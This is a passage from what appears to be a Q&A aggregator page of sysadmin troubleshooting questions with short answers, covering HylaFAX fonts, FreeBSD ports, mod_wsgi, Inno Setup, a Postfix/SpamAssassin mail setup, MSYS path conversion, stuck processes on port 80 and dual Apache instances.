Leaving directory `/tmp/vmware-root/modules/vmci-only' Any ideas?

    Read the article

  • Hylafax: Encounter "No font metric information" when try to send a fax

    - by Chau Chee Yang
    I am using HylaFAX 6.0.5 on Fedora 13 x86_64. As there are no rpm packages available for Fedora 13, I used the source tarball to install HylaFAX myself. Everything seemed fine during compile and install. When I try to send a fax with sendfax I encounter this error: # sendfax -n -d <fax-number> /etc/passwd /usr/local/sbin/textfmt: No font metric information found for "Courier-Bold". Usage: /usr/local/sbin/textfmt [-1] [-2] [-B] [-c] [-D] [-f fontname] [-F fontdir(s)] [-m N] [-o #] [-p #] [-r] [-U] [-Ml=#,r=#,t=#,b=#] [-V #] files... >out.ps Default options: -f Courier -1 -p 11bp -o 0 Error converting document; command was "/usr/local/sbin/textfmt -B -f Courier-Bold -Ml=0.4in -p 11 -s default >'/tmp//sndfaxp5GdJ9' <'/etc/passwd'" It seems there is a problem with fonts. I have ghostscript-fonts installed too. I can't find hyla.conf under /etc/hylafax; there is no /etc/hylafax path on my file system at all. All configuration files seem to be located in /var/spool/hylafax/etc. Please advise. Thank you.
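    textfmt's own usage line shows the knob: -F takes the directory holding the font metrics. On Fedora the ghostscript-fonts package usually puts the .afm/.pfb files under /usr/share/fonts/default/Type1, so a hedged test would be:

      ls /usr/share/fonts/default/Type1 | head     # confirm the metric files are actually there
      /usr/local/sbin/textfmt -B -f Courier-Bold -Ml=0.4in -p 11 -s default \
          -F /usr/share/fonts/default/Type1 < /etc/passwd > /tmp/test.ps

    If that produces a valid PostScript file, the remaining step is to make the path permanent in the HylaFAX configuration under /var/spool/hylafax/etc (or by reconfiguring the build with the correct font directory) so that sendfax stops needing the flag.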

    Read the article

  • Can't install py-subversion on freebsd 8.2

    - by max taldykin
    I'm trying to install python bindings for subversion: # cd /usr/ports/devel/py-subversion # make ===> Patching for py26-subversion-1.6.15 ===> Applying extra patch /usr/ports/devel/py-subversion/../../devel/subversion/files /bindings-patch-subversion--bindings--swig--perl--native--Makefile.PL.in cannot open /usr/ports/devel/py-subversion/../../devel/subversion/files/bindings-patch-subversion--bindings--swig--perl--native--Makefile.PL.in: No such file or directory *** Error code 2 Yes, there is no such file in subversion/files, but there is file patch-subversion::bindings::swig::perl::natives::Makefle.PL.in (with colons instead of hyphens). After renaming and rerunning make I got another error: # make ===> Patching for py26-subversion-1.6.15 ===> Applying extra patch /usr/ports/devel/py-subversion/../../devel/subversion/files/bindings-patch-subversion--bindings--swig--perl--native--Makefile.PL.in cannot open /usr/ports/devel/py-subversion/../../devel/subversion/files/bindings-patch-subversion--bindings--swig--perl--native--Makefile.PL.in: No such file or directory *** Error code 2 But now there is nothing like bindings-* in subversion/files. So, the question is why is it so and how can I install py-subversion? PS: FreeBSD is running on virtual private server, so I think it is somehow patched. # uname -a FreeBSD mskhug.ru 8.2-PRERELEASE FreeBSD 8.2-PRERELEASE #0 r50: Thu Feb 24 10:15:34 IRKT 2011 [email protected]:/root/src/sys/amd64/compile/DEBUG amd64
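    The extra-patch filename py-subversion is asking for only appears in newer revisions of devel/subversion, so the two ports are very likely from different checkouts of the tree; syncing the whole ports tree and rebuilding is the usual cure (standard FreeBSD tools):

      portsnap fetch update        # or csup with a ports supfile on older setups
      cd /usr/ports/devel/py-subversion
      make clean && make && make install

    Renaming patch files by hand tends to just move the breakage one file further along, so a full sync is worth trying first.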

    Read the article

  • apache pointing to the wrong version of python on ubuntu how do I change?

    - by one
    I am setting up a flask application on an Ubuntu 12.04.3 LTS EC2 instance and everything seemed to be working well (i.e. I could get to the webpage via the publicly available url) until I tried to import a module (e.g. numpy) and realised that the Apache Python differs from the one I used to compile mod_wsgi, and also from the one I am using. I am running apache2. The apache2 logs show the warnings (specifically the last line shows the path hasn't changed): [warn] mod_wsgi: Compiled for Python/2.7.5. [warn] mod_wsgi: Runtime using Python/2.7.3. [warn] mod_wsgi: Python module path '/usr/lib/python2.7/:/usr/lib/python2.7/plat-linux2:/usr/lib/python2.7/lib-tk:/usr/lib$ I have tried to set the path in my virtual host conf (my python is located in /home/ubuntu/anaconda/bin along with all of the other libraries): WSGIPythonHome /home/ubuntu/anaconda WSGIPythonPath /home/ubuntu/anaconda <VirtualHost *:80> ServerName xx-xx-xxx-xxx-xxx.compute-1.amazonaws.com ServerAdmin [email protected] WSGIScriptAlias / /var/www/microblog/microblog.wsgi <Directory /var/www/microblog/app/> Order allow,deny Allow from all </Directory> Alias /static /var/www/microblog/app/static <Directory /var/www/FlaskApp/FlaskApp/static/> Order allow,deny Allow from all </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log LogLevel warn CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> But I still get the warnings and the Apache Python path hasn't changed. Where do I need to put the relevant directives to point Apache at my Python version and modules (e.g. scipy, numpy etc)? Separately, could I have avoided this using virtual environments? Thanks in advance.
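    WSGIPythonHome and WSGIPythonPath can only repoint the prefix and module search path; the interpreter version is baked into mod_wsgi.so when it is compiled, which is exactly what the "Compiled for Python/2.7.5 / Runtime using Python/2.7.3" warning is saying. The usual fix is to rebuild mod_wsgi against the interpreter you actually want (version number and paths here are illustrative):

      tar xzf mod_wsgi-3.4.tar.gz && cd mod_wsgi-3.4
      ./configure --with-python=/home/ubuntu/anaconda/bin/python
      make && sudo make install          # replaces the mod_wsgi.so Apache loads
      sudo service apache2 restart

    A virtualenv would not have avoided this particular mismatch (the embedded interpreter would still have been the system one), but once the interpreters agree it does keep the site-packages side of things much cleaner.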

    Read the article

  • Installer not being updated ( probably because of Windows 7 file cache )

    - by Sithu Kyaw
    I'm creating an installer for my Visual FoxPro application using ISTool and Inno Setup. It worked fine the first time. But then I updated my code, re-built the EXE file and compiled the installer again. I found that my update was not compiled into the installer, and I did not see the update in my running application. I noticed that the EXE file built by VFP was updated properly; it seems the installation script did not pick up the updated file. However, when I changed folder names, it did work. I don't want to change folder names every time I run the installation script; that is not a good idea. I think it is because of the Windows 7 file cache. Mine is Windows 7 Home Premium Service Pack 1. For example, my previous output file is located at C:\path\to\myinstaller.exe. When I compile the installation script, the output file there should be overwritten, but it is not. Even after I deleted the file, it did not work. When I changed the output file path to C:\newpath\to\myinstaller.exe it worked, but that is not the solution I'm looking for. Does anyone know how to fix this? [Edit] I also found that the installed directory is not updated properly. For example, I installed the program to C:\Program files\MyInstalledApp. When I run the installer again, that installation directory should be overwritten, but it is not, so I have to uninstall the app before I re-install it. Is there any fix for this?
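    For the install-time half of this (the deployed folder keeping the old EXE), the usual Inno Setup answer is to tell it to overwrite regardless of version resources, since a VFP-built EXE often carries none. A sketch of the [Files] entries (paths are illustrative, flags are standard Inno Setup ones):

      [Files]
      Source: "C:\build\MyApp\myapp.exe"; DestDir: "{app}"; Flags: ignoreversion replacesameversion
      Source: "C:\build\MyApp\data\*";    DestDir: "{app}\data"; Flags: ignoreversion recursesubdirs

    For the compile-time half, it is worth ruling out Windows 7's file virtualization: if the build or the installer output lives under a protected folder (Program Files and the like) and is written without elevation, Windows silently redirects it to the per-user VirtualStore, which looks exactly like "the file never changes until I rename the folder". Building and emitting the installer from an unprotected path such as C:\build usually settles whether the compiler really read a stale file.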

    Read the article

  • I need advices: small memory footprint linux mail server with spam filtering

    - by petermolnar
    I have a VPS which is originally destined to be a webserver but some minimal mail capabilities are needed to be deployed as well, including sending and receiving as standalone server. The current setup is the following: Postfix reveices the mail, the users are in virtual tables, stored in MySQL on connection all servers are tested with policyd-weight service against some DNSBLs all mail is runs through SpamAssassin spamd with the help of spamc client the mail is then delivered with Dovecot 2' LDA (local delivery agent), virtual users as well As you saw... there's no virus scanner running, and that's for a reason: clamav eats all the memory possible and also, virus mails are all filtered out with this setup (I've tested the same with ClamAV enabled for 1,5 years, no virus mail ever got even to ClamAV) I don't use amavisd and I really don't want to. You only need that monster if you have plenty of memory and lots of simultaneous scanners. It's also a nightmare to fine tune by hand. I run policyd-weight instead of policyd and native DNSBLs in postfix. I don't like to send someone away because a single service listed them. Important statement: everything works fine. I receive very small amount of spam, nearly never get a false positive and most of the bad mail is stopped by policyd-weight. The only "problem" that I feel the services at total uses a bit much memory alltogether. I've already cut the modules of spamassassin (see below), but I'd really like to hear some advices how to cut the memory footprint as low as possible, mostly: what plugins SpamAssassin really needs and what are more or less useless, regarding to my current postfix & policyd-weight setup? SpamAssassin rules are also compiled with sa-compile (sa-update runs once a week from cron, compile runs right after that) These are some of the current configurations that may matter, please tell me if you need anything more. postfix/master.cf (parts only) dovecot unix - n n - - pipe flags=DRhu user=vmail:vmail argv=/usr/bin/spamc -e /usr/lib/dovecot/deliver -d ${recipient} -f {sender} postfix/main.cf (parts only) smtpd_helo_required = yes smtpd_helo_restrictions = permit_mynetworks, reject_invalid_hostname, permit smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_invalid_hostname, reject_non_fqdn_hostname, reject_non_fqdn_recipient, reject_unknown_recipient_domain, reject_unauth_pipelining, reject_unauth_destination, check_policy_service inet:127.0.0.1:12525, permit policyd-weight.conf (parts only) $REJECTMSG = "550 Mail appeared to be SPAM or forged. Ask your Mail/DNS-Administrator to correct HELO and DNS MX settings or to get removed from DNSBLs"; $REJECTLEVEL = 4; $DEFER_STRING = 'IN_SPAMCOP= BOGUS_MX='; $DEFER_ACTION = '450'; $DEFER_LEVEL = 5; $DNSERRMSG = '450 No DNS entries for your MTA, HELO and Domain. 
Contact YOUR administrator'; # 1: ON, 0: OFF (default) # If ON request that ALL clients are only checked against RBLs $dnsbl_checks_only = 0; # 1: ON (default), 0: OFF # When set to ON it logs only RBLs which affect scoring (positive or negative) $LOG_BAD_RBL_ONLY = 1; ## DNSBL settings @dnsbl_score = ( # host, hit, miss, log name 'dnsbl.ahbl.org', 3, -1, 'dnsbl.ahbl.org', 'dnsbl.njabl.org', 3, -1, 'dnsbl.njabl.org', 'dnsbl.sorbs.net', 3, -1, 'dnsbl.sorbs.net', 'bl.spamcop.net', 3, -1, 'bl.spamcop.net', 'zen.spamhaus.org', 3, -1, 'zen.spamhaus.org', 'pbl.spamhaus.org', 3, -1, 'pbl.spamhaus.org', 'cbl.abuseat.org', 3, -1, 'cbl.abuseat.org', 'list.dsbl.org', 3, -1, 'list.dsbl.org', ); # If Client IP is listed in MORE DNSBLS than this var, it gets REJECTed immediately $MAXDNSBLHITS = 3; # alternatively, if the score of DNSBLs is ABOVE this level, reject immediately $MAXDNSBLSCORE = 9; $MAXDNSBLMSG = '550 Az levelezoszerveruk IP cime tul sok spamlistan talahato, kerjuk ellenorizze! / Your MTA is listed in too many DNSBLs; please check.'; ## RHSBL settings @rhsbl_score = ( 'multi.surbl.org', 4, 0, 'multi.surbl.org', 'rhsbl.ahbl.org', 4, 0, 'rhsbl.ahbl.org', 'dsn.rfc-ignorant.org', 4, 0, 'dsn.rfc-ignorant.org', # 'postmaster.rfc-ignorant.org', 0.1, 0, 'postmaster.rfc-ignorant.org', # 'abuse.rfc-ignorant.org', 0.1, 0, 'abuse.rfc-ignorant.org' ); # skip a RBL if this RBL had this many continuous errors $BL_ERROR_SKIP = 2; # skip a RBL for that many times $BL_SKIP_RELEASE = 10; ## cache stuff # must be a directory (add trailing slash) $LOCKPATH = '/var/run/policyd-weight/'; # socket path for the cache daemon. $SPATH = $LOCKPATH.'/polw.sock'; # how many seconds the cache may be idle before starting maintenance routines #NOTE: standard maintenance jobs happen regardless of this setting. $MAXIDLECACHE = 60; # after this number of requests do following maintenance jobs: checking for config changes $MAINTENANCE_LEVEL = 5; # negative (i.e. SPAM) result cache settings ################################## # set to 0 to disable caching for spam results. To this level the cache will be cleaned. $CACHESIZE = 2000; # at this number of entries cleanup takes place $CACHEMAXSIZE = 4000; $CACHEREJECTMSG = '550 temporarily blocked because of previous errors'; # after NTTL retries the cache entry is deleted $NTTL = 1; # client MUST NOT retry within this seconds in order to decrease TTL counter $NTIME = 30; # positve (i.,e. HAM) result cache settings ################################### # set to 0 to disable caching of HAM. To this number of entries the cache will be cleaned $POSCACHESIZE = 1000; # at this number of entries cleanup takes place $POSCACHEMAXSIZE = 2000; $POSCACHEMSG = 'using cached result'; #after PTTL requests the HAM entry must succeed one time the RBL checks again $PTTL = 60; # after $PTIME in HAM Cache the client must pass one time the RBL checks again. #Values must be nonfractal. Accepted time-units: s, m, h, d $PTIME = '3h'; # The client must pass this time the RBL checks in order to be listed as hard-HAM # After this time the client will pass immediately for PTTL within PTIME $TEMP_PTIME = '1d'; ## DNS settings # Retries for ONE DNS-Lookup $DNS_RETRIES = 1; # Retry-interval for ONE DNS-Lookup $DNS_RETRY_IVAL = 5; # max error count for unresponded queries in a complete policy query $MAXDNSERR = 3; $MAXDNSERRMSG = 'passed - too many local DNS-errors'; # persistent udp connection for DNS queries. #broken in Net::DNS version 0.51. 
Works with Net::DNS 0.53; DEFAULT: off $PUDP= 0; # Force the usage of Net::DNS for RBL lookups. # Normally policyd-weight tries to use a faster RBL lookup routine instead of Net::DNS $USE_NET_DNS = 0; # A list of space separated NS IPs # This overrides resolv.conf settings # Example: $NS = '1.2.3.4 1.2.3.5'; # DEFAULT: empty $NS = ''; # timeout for receiving from cache instance $IPC_TIMEOUT = 2; # If set to 1 policyd-weight closes connections to smtpd clients in order to avoid too many #established connections to one policyd-weight child $TRY_BALANCE = 0; # scores for checks, WARNING: they may manipulate eachother # or be factors for other scores. # HIT score, MISS Score @client_ip_eq_helo_score = (1.5, -1.25 ); @helo_score = (1.5, -2 ); @helo_score = (0, -2 ); @helo_from_mx_eq_ip_score= (1.5, -3.1 ); @helo_numeric_score= (2.5, 0 ); @from_match_regex_verified_helo= (1,-2 ); @from_match_regex_unverified_helo = (1.6, -1.5 ); @from_match_regex_failed_helo = (2.5, 0 ); @helo_seems_dialup = (1.5, 0 ); @failed_helo_seems_dialup= (2, 0 ); @helo_ip_in_client_subnet= (0,-1.2 ); @helo_ip_in_cl16_subnet = (0,-0.41 ); #@client_seems_dialup_score = (3.75, 0 ); @client_seems_dialup_score = (0, 0 ); @from_multiparted = (1.09, 0 ); @from_anon= (1.17, 0 ); @bogus_mx_score = (2.1, 0 ); @random_sender_score = (0.25, 0 ); @rhsbl_penalty_score = (3.1, 0 ); @enforce_dyndns_score = (3, 0 ); spamassassin/init.pre (I've put the .pre files together) loadplugin Mail::SpamAssassin::Plugin::Hashcash loadplugin Mail::SpamAssassin::Plugin::SPF loadplugin Mail::SpamAssassin::Plugin::Pyzor loadplugin Mail::SpamAssassin::Plugin::Razor2 loadplugin Mail::SpamAssassin::Plugin::AutoLearnThreshold loadplugin Mail::SpamAssassin::Plugin::MIMEHeader loadplugin Mail::SpamAssassin::Plugin::ReplaceTags loadplugin Mail::SpamAssassin::Plugin::Check loadplugin Mail::SpamAssassin::Plugin::HTTPSMismatch loadplugin Mail::SpamAssassin::Plugin::URIDetail loadplugin Mail::SpamAssassin::Plugin::Bayes loadplugin Mail::SpamAssassin::Plugin::BodyEval loadplugin Mail::SpamAssassin::Plugin::DNSEval loadplugin Mail::SpamAssassin::Plugin::HTMLEval loadplugin Mail::SpamAssassin::Plugin::HeaderEval loadplugin Mail::SpamAssassin::Plugin::MIMEEval loadplugin Mail::SpamAssassin::Plugin::RelayEval loadplugin Mail::SpamAssassin::Plugin::URIEval loadplugin Mail::SpamAssassin::Plugin::WLBLEval loadplugin Mail::SpamAssassin::Plugin::VBounce loadplugin Mail::SpamAssassin::Plugin::Rule2XSBody spamassassin/local.cf (parts) use_bayes 1 bayes_auto_learn 1 bayes_store_module Mail::SpamAssassin::BayesStore::MySQL bayes_sql_dsn DBI:mysql:db:127.0.0.1:3306 bayes_sql_username user bayes_sql_password pass bayes_ignore_header X-Bogosity bayes_ignore_header X-Spam-Flag bayes_ignore_header X-Spam-Status ### User settings user_scores_dsn DBI:mysql:db:127.0.0.1:3306 user_scores_sql_password user user_scores_sql_username pass user_scores_sql_custom_query SELECT preference, value FROM _TABLE_ WHERE username = _USERNAME_ OR username = '$GLOBAL' OR username = CONCAT('%',_DOMAIN_) ORDER BY username ASC # for better speed score DNS_FROM_AHBL_RHSBL 0 score __RFC_IGNORANT_ENVFROM 0 score DNS_FROM_RFC_DSN 0 score DNS_FROM_RFC_BOGUSMX 0 score __DNS_FROM_RFC_POST 0 score __DNS_FROM_RFC_ABUSE 0 score __DNS_FROM_RFC_WHOIS 0 UPDATE 01 As adaptr advised I remove policyd-weight and configured postfix postscreen, this resulted approximately -15-20 MB from RAM usage and a lot faster work. I'm not sure it's working at full capacity but it seems promising.
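    For anyone repeating the swap described in UPDATE 01: the postscreen pieces that take over policyd-weight's DNSBL weighting live in main.cf and require Postfix 2.8 or later; a sketch (sites and weights are examples, not a recommendation):

      postscreen_access_list     = permit_mynetworks
      postscreen_dnsbl_sites     = zen.spamhaus.org*3, bl.spamcop.net*2, dnsbl.sorbs.net*1
      postscreen_dnsbl_threshold = 3
      postscreen_dnsbl_action    = enforce
      postscreen_greet_action    = enforce

    master.cf then needs the smtp inet service handed to postscreen, with smtpd as a pass service plus the dnsblog and tlsproxy helpers, as laid out in the Postfix POSTSCREEN_README; because postscreen rejects most bots before an smtpd process is even forked, it is also where most of the memory saving comes from.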

    Read the article

  • How do I stop MSYS from transforming my compiler options?

    - by Carl Norum
    Is there a way to stop MSYS/MinGW from transforming what it thinks are paths on my command lines? I have a project that's using nmake & Microsoft Visual Studio 2003 (yeecccch). I have the build system all ported and ready to go for GNU make (and tested with Cygwin). Something weird is happening to my compiler flags when I try to compile in an MSYS environment, though. Here's a simplified example: $ cl /nologo Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 13.10.6030 for 80x86 Copyright (C) Microsoft Corporation. All rights reserved. /out:nologo.exe C:/msys/1.0/nologo LINK : fatal error LNK1181: cannot open input file 'C:/msys/1.0/nologo.obj' As you can see, MSYS is transforming the /nologo compiler switch into a windows path, and then sending that to the compiler. I really don't want this to happen - in fact I'd be happy if MSYS never transformed any paths - my build system had to take care of all that when I first ported to Cygwin. Is there a way to make that happen? It does work to change the command to $ cl -nologo Which produces the expected results, but this build system is very large and very painful to update. I really don't want to have to go in and change every use of a / for a flag to a -. In particular, there may be tools that don't support the use of the - at all, and then I'll really be stuck. Thanks for any suggestions!
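    Two workarounds are commonly used, depending on which MSYS generation this is (both hedged, and neither touches the makefiles):

      cl //nologo foo.c              # original MSYS/MinGW: a doubled slash is passed through as one literal '/'
      MSYS2_ARG_CONV_EXCL='*' make   # MSYS2 only: disable path conversion for everything make spawns

    Failing that, running the nmake-era build from a plain cmd.exe, or from Cygwin (which never rewrites arguments), sidesteps the translation entirely, which matches what already worked during the port.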

    Read the article

  • Process killing trouble

    - by Aditya Singh
    I am writing server software that involves a lot of testing on the Java / Scala platform. Whenever I compile and execute the code, it starts listening on port 80. Sometimes I need to terminate it with Ctrl+C when it hangs. In that case, Ubuntu does not free the port, so in order to run the process again I have to restart the machine. I see this in ps aux: root 1924 0.0 0.0 5796 1660 pts/0 T 05:44 0:00 sudo scala - root 1925 0.2 1.5 491448 40796 pts/0 Tl 05:44 0:03 java -Xmx256M -Xms16M So processes 1924 and 1925. I ran sudo kill on both of these, but they keep persisting even after a long time. sudo nmap -T Aggressive -A -v 127.0.0.1 -p 1-65000 Scanning localhost (127.0.0.1) [65000 ports] Discovered open port 80/tcp on 127.0.0.1 It means it's still there! sudo netstat --tcp --udp --listening --program tcp6 0 0 [::]:www [::]:* LISTEN 1925/java tcp6 0 0 ip6-localhost:ipp [::]:* LISTEN 1185/cupsd This means it's 1925 - java. How do I kill it?
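    The T/Tl state in that ps output means the two processes are stopped, not dead; a plain kill (SIGTERM) stays pending until a stopped process is continued, which is why nothing seems to happen. SIGKILL, or killing by port, does not have that problem (standard Ubuntu tools):

      sudo lsof -i :80               # confirm which PID still owns the port
      sudo kill -9 1924 1925         # SIGKILL works even on stopped (state T) processes
      sudo fuser -k 80/tcp           # or kill by port; -k sends SIGKILL by default

    Separately, a socket can linger in TIME_WAIT for a short while after its owner dies; enabling address reuse on the listening socket in the server code (setReuseAddress on the Java side) avoids having to wait, or reboot, between test runs.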

    Read the article

  • Apache2 MPM-prefork MPM-worker multiple instances on same Ubuntu host machine possible?

    - by user60985
    I have a live Apache2/MPM-Worker instance running Django. I want to also run an Apache2/MPM-prefork instance to run some Drupal6 applications on the same host machine and utilize a vast selection of PHP modules that run on the prefork model. I plan to use my MPM-worker instance to reverse proxy to the Apache2-prefork instance for URLS starting with myhost.com/drupal6/. It seems theoretically doable/configurable by having the second Apache2-prefork instance configured to listen on an internal port, say 127.0.0.1:8080 and having my current Apache2-worker configured to proxy pass and reverse pass to it for the 'drupal6' URLs. However, how do I compile or install the apache2-prefork version so it has a different executable name than /usr/sbin/apache2, for example /usr/sbin/apache2p, and so apache2ctl has a different name, say apache2pctl, and that apache2pctl invokes the /usr/sbin/apache2p instead of /usr/sbin/apache2... and so on down the line (eg /etc/apache2p) so I can start and restart my two instances independently? As I understand it, no one executable of 'apache2' can be compiled with both the MPM-prefork and MPM-worker modules, so it seems I need two separate versions of the apache2 MPM flavors. But then I need to invoke and control them by separate names, I assume. I looked at the configuration options for apache2 and I am a bit queasy about compiling a second apache2 version with prefork because I am not sure I can set all the options so that none of my current apache2 files is overwritten. Is there a way? Is there a standard solution to separately installing and controlling prefork and worker apache2 executables on the same machine without them stepping on each other during installation or operation?
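    Yes, and the cleanest route is usually not to rename pieces of the packaged Apache but to build the prefork instance entirely under its own prefix, so it brings its own apachectl, conf tree, pid file and logs and the two never collide (version and paths are illustrative):

      tar xzf httpd-2.2.x.tar.gz && cd httpd-2.2.x
      ./configure --prefix=/opt/apache2-prefork --with-mpm=prefork --enable-so --with-port=8080
      make && sudo make install
      sudo /opt/apache2-prefork/bin/apachectl start    # controlled independently of the packaged worker instance

    In the prefork instance's httpd.conf, Listen 127.0.0.1:8080 keeps it off the public interface; the existing worker instance then only needs mod_proxy/mod_proxy_http enabled plus ProxyPass /drupal6/ http://127.0.0.1:8080/drupal6/ and the matching ProxyPassReverse line, which is the setup described in the question and avoids patching the distribution packages at all.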

    Read the article
